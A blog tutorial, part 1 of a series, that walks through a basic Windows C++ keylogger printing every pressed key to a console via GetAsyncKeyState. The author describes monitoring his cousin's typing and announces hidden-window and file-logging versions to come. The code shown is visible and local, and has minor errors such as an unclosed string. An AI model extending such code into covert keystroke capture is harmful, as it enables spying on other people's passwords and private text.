Key Logger – Part 1

I wrote a keylogger a while back so that when my cousin used my computer and he enters a certain keyword my keylogger would shut it down. It was password locked so he couldnt log back in. I wanted him to learn programming, but knowing him he’d start googling for games on the internet if i left him unmonitored. So the second he typed something like “game” my computer would shut off.

In this 3 part tutorial series i’ll show you how to make a simple keylogger to get you warmed up, another one that logs whatever is typed to a file and an advanced one that detects words pressed and shutdown your pc when a certain word is pressed. Lets begin.

The function of the day is this guy here GetAsyncKeyState(keycode). keycode is any number representing a character in the ascii table. The function returns -32767 is the key is down, which is what we’re looking out for. Here’s an example usage:


if(GetAsyncKeyState('c')==-32767)
 {
 printf("you pressed 'c');
}

if(GetAsyncKeyState(‘c’) & 0x8000)  is another way of writing it.

In this tutorial we’re writing a simple keylogger that prints whatever is typed.

First of all include necessary headers:


#include <Windows.h>
#include <cstdio>

we need windows.h for the GetAsyncKeyState function and cstdio for printf.

next is the main function


int main()
{
 //run until the window is closed
 while(true)
 {
 //we're checking every key, so a loop throught 0 to 255 should cover more
 //than all the keys
 for(int i=0;i<256;i++)
 {
 //check the state of the key
 //if its down then GetAsynrcKeyState returns -32767
 if(GetAsyncKeyState(i)==-32767)
 {
 //output character if its key is down
 printf("%c",i);
 }
 }
 }
}

The comments should be sufficient to explain whats going on, but i’ll do it again. The loop goes on forever, until the window is closed, thats why i have while(true). The for(int i=0;i<256;i++) is for checking through every character in the ascii table to see if the equivalent key on the keyboard is pressed. If a key is down then the expression GetAsyncKeyState(i)==-32767 is true then whaveter is the in the body of that if statement is executed. In this case it just prints the character code of the key pressed.

The last characters of that sentence were special characters. I was pressing alt, ctrl, shift and other keys. Those are their ascii equivalent keycodes. So we need to look out for these keycodes and output them differently. A switch statement should do:


int main()
{
 //run until the window is closed
 while(true)
 {
 //we're checking every key, so a loop throught 0 to 255 should cover more
 //than all the keys
 for(int i=0;i<256;i++)
 {
 //check the state of the key
 //if its down then GetAsynrcKeyState returns -32767
 if(GetAsyncKeyState(i)==-32767)
 {
 //output character if its key is down
 switch(i)
 {
 case VK_DELETE:
 printf("<delete>");
 break;
 case VK_BACK:
 printf("<backspace>");
 break;
 case VK_LEFT:
 printf("<left>");
 break;
 case VK_RIGHT:
 printf("<right>");
 break;
 case VK_UP:
 printf("<up>");
 break;
 case VK_DOWN:
 printf("<down>");
 break;
 case VK_SHIFT:
 printf("<shift>");
 break;
 case VK_END:
 printf("<end>");
 break;
 case VK_INSERT:
 printf("<insert>");
 break;
 case VK_LCONTROL:
 printf("<left control>");
 break;
 case VK_RCONTROL:
 printf("<right control>");
 break;
 case VK_SPACE:
 printf("<space>");
 break;
 default:
 printf("%c",i);
 break;
 }
 }
 }
 }
}

The windows.h header has defined keycodes (like VK_SPACE)so we can use them instead of the actual code. There are others, but i couldnt bother writing them all out. Here’s what we should have now:

So, there you go, a simple keylogger. Next tutorial i’ll show you how to hide the window and logkeypresses to a file.

Happy hacking..uh..i mean coding 😀

 

full sourcecode:


#include <Windows.h>
#include <cstdio>

int main()
{
 //run until the window is closed
 while(true)
 {
 //we're checking every key, so a loop throught 0 to 255 should cover more
 //than all the keys
 for(int i=0;i<256;i++)
 {
 //check the state of the key
 //if its down then GetAsynrcKeyState returns -32767
 if(GetAsyncKeyState(i)==-32767)
 {
 //output character if its key is down
 switch(i)
 {
 case VK_DELETE:
 printf("<delete>");
 break;
 case VK_BACK:
 printf("<backspace>");
 break;
 case VK_LEFT:
 printf("<left>");
 break;
 case VK_RIGHT:
 printf("<right>");
 break;
 case VK_UP:
 printf("<up>");
 break;
 case VK_DOWN:
 printf("<down>");
 break;
 case VK_SHIFT:
 printf("<shift>");
 break;
 case VK_END:
 printf("<end>");
 break;
 case VK_INSERT:
 printf("<insert>");
 break;
 case VK_LCONTROL:
 printf("<left control>");
 break;
 case VK_RCONTROL:
 printf("<right control>");
 break;
 case VK_SPACE:
 printf("<space>");
 break;
 default:
 printf("%c",i);
 break;
 }
 }
 }
 }
}

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s